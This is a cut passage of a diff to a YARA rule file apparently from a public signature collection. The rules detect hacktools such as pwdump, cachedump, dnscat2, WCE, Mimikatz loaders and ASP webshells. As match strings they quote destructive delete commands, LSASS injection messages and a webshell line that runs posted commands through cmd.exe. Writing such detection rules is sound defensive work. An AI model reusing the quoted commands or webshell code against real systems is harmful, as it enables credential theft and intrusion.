+		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Linux_Portscan_Shark_1 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Thecard
 {
 	meta:
-		description = "Detects Linux Port Scanner Shark"
+		description = "Disclosed hacktool set - file Thecard.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b264106-3536-56f4-9e8c-68f3756af07d"
-		date = "2016-04-01"
+		id = "a9946aeb-2042-522f-8d91-f8b96341bb64"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3190-L3207"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1415-L1432"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e807ed6c83c8d908bfe29c65abd7b877b65655cc64cd1497fc124a2fd88cd1e9"
-		score = 75
+		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+		logic_hash = "29e1fb2e0bfa60e5406f9fd1c0ec99f0fc1b416ffc4d59846627e40959a32c63"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4da0e535c36c0c52eaa66a5df6e070c52e7ddba13816efc3da5691ea2ec06c18"
-		hash2 = "e395ca5f932419a4e6c598cae46f17b56eb7541929cdfb67ef347d9ec814dea3"
 
 	strings:
-		$s0 = "rm -rf scan.log session.txt" fullword ascii
-		$s17 = "*** buffer overflow detected ***: %s terminated" fullword ascii
-		$s18 = "*** stack smashing detected ***: %s terminated" fullword ascii
+		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+		$s1 = "Http://www.coffeewl.com" fullword ascii
+		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+		$s3 = "for /L %%a in (" ascii
+		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7362 and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Linux_Portscan_Shark_2
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Blast
 {
 	meta:
-		description = "Detects Linux Port Scanner Shark"
+		description = "Disclosed hacktool set - file Blast.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eea378d5-0399-5035-8573-139878fa1abc"
-		date = "2016-04-01"
+		id = "9ac723c4-e88d-5fb3-b18f-c8b764c8acf3"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3209-L3226"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1434-L1448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45efbbe01c45065efc07e9c75b6a7cdcae469861f84df4a1e1381fe864f7ddc0"
-		score = 75
+		hash = "b07702a381fa2eaee40b96ae2443918209674051"
+		logic_hash = "77902c7b23bab80d035f1dbe074554f16f99b2c9e31c80171296a1d33f705dac"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5f80bd2db608a47e26290f3385eeb5bfc939d63ba643f06c4156704614def986"
-		hash2 = "90af44cbb1c8a637feda1889d301d82fff7a93b0c1a09534909458a64d8d8558"
 
 	strings:
-		$s1 = "usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>" fullword ascii
-		$s2 = "Difference between server modulus and host modulus is only %d. It's illegal and may not work" fullword ascii
-		$s3 = "rm -rf scan.log" fullword ascii
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+		$s1 = "@echo off" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Dnscat2_Hacktool : FILE
+rule SIGNATURE_BASE_Vubrute_Vubrute
 {
 	meta:
-		description = "Detects dnscat2 - from files dnscat, dnscat2.exe"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23cca0fe-3e4e-5b91-8b53-933de8ff264a"
-		date = "2016-05-15"
+		id = "7ac74c85-465c-5eb5-8e91-004f28cabb75"
+		date = "2014-11-22"
 		modified = "2025-12-18"
-		reference = "https://downloads.skullsecurity.org/dnscat2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3235-L3254"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1450-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c163a62b607323e08ca083a7091585550c830827728a8a60e25af8db6550ed1c"
-		score = 75
+		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+		logic_hash = "9dab03b70b249c0c481e3bc98c3196e83da93ea2723674d38baf32469392d52a"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "8bc8d6c735937c9c040cbbdcfc15f17720a7ecef202a19a7bf43e9e1c66fe66a"
-		hash2 = "4a882f013419695c8c0ac41d8a0fde1cf48172a89e342c504138bc6f1d13c7c8"
 
 	strings:
-		$s1 = "--exec -e <process>     Execute the given process and link it to the stream." fullword ascii
-		$s2 = "Sawlog" fullword ascii
-		$s3 = "COMMAND_EXEC [request] :: request_id: 0x%04x :: name: %s :: command: %s" fullword ascii
-		$s4 = "COMMAND_SHELL [request] :: request_id: 0x%04x :: name: %s" fullword ascii
-		$s5 = "[Tunnel %d] connection to %s:%d closed by the server!" fullword ascii
+		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+		$s1 = "http://ubrute.com" fullword ascii
+		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
+		$s14 = "error.txt" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 2 of ( $s* ) ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_WCE_In_Memory
+rule SIGNATURE_BASE_DK_Brute
 {
 	meta:
-		description = "Detects Windows Credential Editor (WCE) in memory (and also on disk)"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90c90ca5-e3be-5035-b35c-c2e7faec43a5"
-		date = "2016-08-28"
+		id = "c9ea0dcf-10f3-5161-aebc-2db04c24b0a5"
+		date = "2014-11-22"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3256-L3270"
+		reference = "http://goo.gl/xiIphp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1468-L1485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74ab7772db5b1de8a4eae03370e2be3cd35004730f84d472677688109a1d6d88"
-		score = 80
+		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+		logic_hash = "a48ba3513c9c99066e9dda02859089e9e1db15e7bd52443795771609f011c94a"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "wkKUSvflehHr::o:t:s:c:i:d:a:g:" fullword ascii
-		$s2 = "wceaux.dll" fullword ascii
+		$s6 = "get_CrackedCredentials" fullword ascii
+		$s13 = "Same port used for two different protocols:" fullword wide
+		$s18 = "coded by fLaSh" fullword ascii
+		$s19 = "get_grbToolsScaningCracking" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Pstgdump : FILE
+rule SIGNATURE_BASE_Vubrute_Config
 {
 	meta:
-		description = "Detects a tool used by APT groups - file pstgdump.exe"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
 		author = "Florian Roth (Nextron Systems)"
-		id = "86a105a3-b5b5-58b2-99bd-ec05f31adb6b"
-		date = "2016-09-08"
+		id = "25cad108-b2d6-5886-bb2f-e614e05649fa"
+		date = "2014-11-22"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3272-L3290"
+		reference = "http://goo.gl/xiIphp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1487-L1507"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c4f8697b1b65007acc4fdabd1c6263a428448232f95dbb12d8f737297893157"
-		score = 75
+		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+		logic_hash = "b4c54d5ecb269c7310b5bd2a9e8fe5d6c75503f8cb1f25679399e25185d9cb51"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65d48a2f868ff5757c10ed796e03621961954c523c71eac1c5e044862893a106"
 
 	strings:
-		$x1 = "\\Release\\pstgdump.pdb" ascii
-		$x2 = "Failed to dump all protected storage items - see previous messages for details" fullword ascii
-		$x3 = "ptsgdump [-h][-q][-u Username][-p Password]" fullword ascii
-		$x4 = "Attempting to impersonate domain user '%s' in domain '%s'" fullword ascii
-		$x5 = "Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d" fullword ascii
-		$x6 = "Unable to obtain handle to PStoreCreateInstance in pstorec.dll" fullword ascii
+		$s2 = "Restore=1" fullword ascii
+		$s6 = "Thread=" ascii
+		$s7 = "Running=1" fullword ascii
+		$s8 = "CheckCombination=" fullword ascii
+		$s10 = "AutoSave=1.000000" fullword ascii
+		$s12 = "TryConnect=" ascii
+		$s13 = "Tray=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Lsremora : FILE
+rule SIGNATURE_BASE_Sig_238_Hunt
 {
 	meta:
-		description = "Detects a tool used by APT groups"
+		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c15c583f-70cd-5a80-bdea-a14582097e50"
-		date = "2016-09-08"
+		id = "5d9d1f99-2f12-51e9-a554-b349e19d00fb"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3292-L3314"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1509-L1528"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac8f6b7284307456749b3386340a2b3deb0718bc68875bc90bccf74a96469a59"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+		logic_hash = "66d22c4dc2864d61bd485d6840887905f020fce8e19bb976ec09acaa6ed0387c"
+		score = 60
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5"
-		hash2 = "e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e"
 
 	strings:
-		$x1 = "Target: Failed to load primary SAM functions." fullword ascii
-		$x2 = "lsremora64.dll" fullword ascii
-		$x3 = "PwDumpError:999999" fullword wide
-		$x4 = "PwDumpError" fullword wide
-		$x5 = "lsremora.dll" fullword ascii
-		$s1 = ":\\\\.\\pipe\\%s" fullword ascii
-		$s2 = "x%s_history_%d:%d" fullword wide
-		$s3 = "Using pipe %s" fullword ascii
+		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+		$s3 = "Usage - hunt \\\\servername" fullword ascii
+		$s4 = ".share = %S - %S" fullword wide
+		$s5 = "SMB share enumerator and admin finder " fullword ascii
+		$s7 = "Hunt only runs on Windows NT..." fullword ascii
+		$s8 = "User = %S" fullword ascii
+		$s9 = "Admin is %s\\%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Servpw : FILE
+rule SIGNATURE_BASE_Sig_238_Listip
 {
 	meta:
-		description = "Detects a tool used by APT groups - file servpw.exe"
+		description = "Disclosed hacktool set (old stuff) - file listip.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48b9dae1-16b3-563c-ac4e-b71f3a86b38a"
-		date = "2016-09-08"
+		id = "417faf20-ee07-5c3e-bfcf-89599e38e62e"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3316-L3335"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1530-L1548"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "150466c23ea7aa20f6e60c592ab6bd2f42e3a48a65a6665b89a9f19fa61aae8f"
-		score = 75
+		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+		logic_hash = "db5cc21e8c76fdd10953ba0f06c4a1ad319ee522d9def7777dad66612b51edfc"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46"
-		hash2 = "0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301"
 
 	strings:
-		$s1 = "Unable to open target process: %d, pid %d" fullword ascii
-		$s2 = "LSASS.EXE" fullword wide
-		$s3 = "WriteProcessMemory failed: %d" fullword ascii
-		$s4 = "lsremora64.dll" fullword ascii
-		$s5 = "CreateRemoteThread failed: %d" fullword ascii
-		$s6 = "Thread code: %d, path: %s" fullword ascii
+		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+		$s4 = "Local Host Name: %s" fullword ascii
+		$s5 = "Packed by exe32pack 1.38" fullword ascii
+		$s7 = "Local Computer Name: %s" fullword ascii
+		$s8 = "Local IP Adress: %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fgexec : FILE
+rule SIGNATURE_BASE_Arttrayhookdll
 {
 	meta:
-		description = "Detects a tool used by APT groups - file fgexec.exe"
+		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ffe47b9-81a8-5eb4-b46f-db9d23682de4"
-		date = "2016-09-08"
+		id = "324561fc-024c-5583-aa25-6b13e9616898"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3337-L3353"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1550-L1564"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3672255d7829520aa8ca792519f645b86fe4244a16652a960375f23baa7d32b3"
-		score = 75
+		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+		logic_hash = "e43cefdb11df870f4732e74782ecefb94c0a4850c4aa994e4fbc940f523d2434"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8697897bee415f213ce7bc24f22c14002d660b8aaffab807490ddbf4f3f20249"
 
 	strings:
-		$x1 = "\\Release\\fgexec.pdb" ascii
-		$x2 = "fgexec Remote Process Execution Tool" fullword ascii
-		$x3 = "fgexec CallNamedPipe failed" fullword ascii
-		$x4 = "fizzgig and the mighty foofus.net team" fullword ascii
+		$s0 = "ArtTrayHookDll.dll" fullword ascii
+		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Cachedump : FILE
+rule SIGNATURE_BASE_Sig_238_Eee
 {
 	meta:
-		description = "Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe"
+		description = "Disclosed hacktool set (old stuff) - file eee.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebcaeb73-d2df-5a4c-9f50-b4a01293b88b"
-		date = "2016-09-08"
+		id = "9d3ad3a9-0498-5ca3-ac19-f250cb10c4d3"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3355-L3375"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1566-L1585"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e4d710ed9dab12114e87fa33abe6db6245c780b31bcd94fbd21e75aaa355ca8"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+		logic_hash = "b12c11f46125a33a2d7d9d02f25762c07b9d5088f70887c000b29e82a7921399"
+		score = 60
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "cf58ca5bf8c4f87bb67e6a4e1fb9e8bada50157dacbd08a92a4a779e40d569c4"
-		hash2 = "e38edac8c838a043d0d9d28c71a96fe8f7b7f61c5edf69f1ce0c13e141be281f"
 
 	strings:
-		$s1 = "Failed to open key SECURITY\\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? " fullword ascii
-		$s2 = "Unable to open LSASS.EXE process" fullword ascii
-		$s3 = "Service not found. Installing CacheDump Service (%s)" fullword ascii
-		$s4 = "CacheDump service successfully installed." fullword ascii
-		$s5 = "Kill CacheDump service (shouldn't be used)" fullword ascii
-		$s6 = "cacheDump [-v | -vv | -K]" fullword ascii
+		$s0 = "szj1230@yesky.com" fullword wide
+		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+		$s4 = "MailTo:szj1230@yesky.com" fullword wide
+		$s5 = "Command1_Click" fullword ascii
+		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+		$s11 = "vb5chs.dll" fullword ascii
+		$s12 = "MSVBVM50.DLL" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Pwdump_B : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Asp4
 {
 	meta:
-		description = "Detects a tool used by APT groups - file PwDump.exe"
+		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aad974f1-76bf-5aae-8376-a4fd3f27b345"
-		date = "2016-09-08"
+		id = "7718aa71-fc0f-505c-a035-b78ae0438653"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3377-L3397"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1587-L1607"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d50ad359b9433439cddda9408d227f35ee8de3280ad24f42c5e6ef1e6a1526bd"
-		score = 75
+		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+		logic_hash = "dab19a2b92bbfe17cb860981d7bd5c3f3dd1a9e7c2ac5093fc4117f9205c1c27"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3c796092f42a948018c3954f837b4047899105845019fce75a6e82bc99317982"
 
 	strings:
-		$x1 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName" fullword ascii
-		$x2 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword ascii
-		$x3 = "where -x targets a 64-bit host" fullword ascii
-		$x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii
-		$s1 = "lsremora64.dll" fullword ascii
-		$s2 = "lsremora.dll" fullword ascii
-		$s3 = "servpw.exe" fullword ascii
+		$s0 = "system.dll" fullword ascii
+		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
+		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
+		$s5 = "atype=request(\"atype\") " fullword ascii
+		$s7 = "AceiveX dll" fullword ascii
+		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+		$s10 = "sys.reboot(atype)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $x* ) ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Msbuild_Mimikatz_Execution_Via_XML
+rule SIGNATURE_BASE_Aspfile1
 {
 	meta:
-		description = "Detects an XML that executes Mimikatz on an endpoint via MSBuild"
+		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98aa68b9-6de4-5353-8d87-9e974529c044"
-		date = "2016-10-07"
+		id = "1b66dec0-22c8-5937-a0b2-22cbc68241ef"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3408-L3427"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1609-L1627"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f926a2d5ab987b97c6ed2a89c69eac5549d8b7885bdbf75ce40e05e6ce6cfa7a"
-		score = 75
+		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+		logic_hash = "4968e44f807f8ffface65e21fd8684ccfaee281b4da10f5110482c3f26ccac26"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<Project ToolsVersion=" ascii
-		$x2 = "</SharpLauncher>" fullword ascii
-		$s1 = "\"TVqQAAMAAAA" ascii
-		$s2 = "System.Convert.FromBase64String(" ascii
-		$s3 = ".Invoke(" ascii
-		$s4 = "Assembly.Load(" ascii
-		$s5 = ".CreateInstance(" ascii
+		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Fscan_Portscanner : FILE
+rule SIGNATURE_BASE_Editserver
 {
 	meta:
-		description = "Fscan port scanner scan output / strings"
+		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "400383dc-8bc0-5e77-a3f3-d6ba9f4c3c0f"
-		date = "2017-01-06"
+		id = "de6bf995-1c7c-561f-98df-e8748d5fb157"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://twitter.com/JamesHabben/status/817112447970480128"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3438-L3452"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1629-L1651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35770f040da0b14fe4492a44383e332c9912bd89943838627491196ce8f0ec37"
-		score = 75
+		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+		logic_hash = "6a8f6fcf8f4a0ea5ac114150d7becbd716be0bb40cd45fd5c76a4a8a328e5e40"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Time taken:" fullword ascii
-		$s2 = "Scan finished at" fullword ascii
-		$s3 = "Scan started at" fullword ascii
+		$s0 = "%s Server.exe" fullword ascii
+		$s1 = "Service Port: %s" fullword ascii
+		$s2 = "The Port Must Been >0 & <65535" fullword ascii
+		$s8 = "3--Set Server Port" fullword ascii
+		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+		$s13 = "Service Name: %s" fullword ascii
+		$s14 = "Server Password: %s" fullword ascii
+		$s17 = "Inject Process Name: %s" fullword ascii
+		$x1 = "WinEggDrop Shell Congirator" fullword ascii
 
 	condition:
-		filesize < 20KB and 3 of them
+		5 of ( $s* ) or $x1
 }
-rule SIGNATURE_BASE_WPR_Loader_EXE : FILE
+rule SIGNATURE_BASE_Sig_238_Letmein
 {
 	meta:
-		description = "Windows Password Recovery - file loader.exe"
+		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97fa3efb-9e7a-52ef-9e26-3fdd573d4d30"
-		date = "2017-03-15"
+		id = "5dba055f-1928-534a-8d0e-11dda56d93b7"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3463-L3483"
+		reference = "https://github.com/Neo23x0/signature-base"
